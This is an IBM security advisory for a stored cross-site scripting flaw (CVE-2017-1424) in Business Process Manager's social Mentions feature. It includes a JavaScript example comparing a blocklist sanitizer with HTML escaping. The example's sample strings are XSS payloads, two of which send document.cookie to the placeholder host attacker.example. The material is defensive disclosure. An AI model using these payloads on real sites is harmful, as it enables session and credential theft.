IBM Business Process Manager (BPM) lets users post content to one another through its social features without fully removing HTML markup from that content. A user can therefore alter parts of the Web UI that other users see, up to and including injecting script.
CVEID: CVE-2017-1424
DESCRIPTION: IBM Business Process Manager is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, altering the intended functionality and potentially leading to credentials disclosure within a trusted session.
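The failure mode the advisory describes, incomplete removal of HTML markup from user-supplied content, is illustrated below with an added example. This is not IBM code and does not reproduce the BPM filter; the blocklist sanitizer naiveStripMarkup is a hypothetical stand-in for "partially removing markup", the mention strings are constructed samples, and the attacker.example hostname is a placeholder. It shows why a blocklist leaves a stored XSS path open while escaping every HTML metacharacter does not.

```javascript
// Added example (hypothetical sanitizers, constructed inputs); not IBM BPM code.
// Stored XSS via social content: a filter that only drops a few tags still lets
// a mention such as  @alice <img src=x onerror=...>  reach other users' browsers
// as live markup. Escaping the metacharacters makes the browser treat it as text.

// Hypothetical blocklist filter: strips <script> and a handful of tags, keeps all
// other markup and attributes. This is the kind of "partial removal" that fails.
function naiveStripMarkup(input) {
  return input
    .replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, "")
    .replace(/<\/?(iframe|object|embed)\b[^>]*>/gi, "");
}

// Hardened path: escape the five HTML metacharacters so nothing is parsed as a tag.
function escapeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return input.replace(/[&<>"']/g, (c) => map[c]);
}

// Check on sanitizer output: a literal "<" followed by a tag-name character (or "/"
// or "!") is exactly what an HTML parser turns into an element. Escaped output
// contains "&lt;" instead, so it never matches.
function containsActiveMarkup(output) {
  return /<\/?[a-z!]/i.test(output);
}

// Constructed sample mentions, as users might post them (attacker.example is a placeholder).
const samples = [
  "@alice thanks for the review",
  '@alice <script>location="https://attacker.example/?c="+document.cookie</script>',
  '@alice <img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
  '@alice <a href="javascript:alert(document.cookie)">click</a>',
];

// Run every sample through a sanitizer and count how many still carry live markup.
function countSurvivingPayloads(sanitizer) {
  return samples.filter((s) => containsActiveMarkup(sanitizer(s))).length;
}

// Stand-alone run: the blocklist lets two of the three payloads through, escaping none.
console.log("blocklist survivors:", countSurvivingPayloads(naiveStripMarkup));
console.log("escape survivors:   ", countSurvivingPayloads(escapeHtml));
```

The detector only looks at the sanitizer's output string; it is deliberately simple and is not a substitute for rendering the content in a real browser, but it is enough to show that the second and third samples pass the blocklist untouched while none of them survive escaping.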
CVSS Base Score: 5.4
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/127477> for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)
AFFECTED PRODUCTS AND VERSIONS:
- IBM Business Process Manager Advanced V8.5.7.0 including cumulative fix 2017.06
WORKAROUNDS AND MITIGATIONS:
For IBM BPM V8.5.7.0 through V8.5.7.0 CF 2017.06:
Disable all social features, or only the Mentions feature within the social features, by setting the Process Portal custom property com.ibm.bpm.portal.disableSocial=all or com.ibm.bpm.portal.disableSocial=mentions… Setting all turns off every social feature, while mentions turns off only the Mentions feature; either removes the vulnerable input path. Consult the documentation <https://www.ibm.com/support/knowledgecenter/en/SSFTN5_8.5.7/com.ibm.wbpm.admin.doc/topics/tadm_portal_customprops_mashups.html> for details.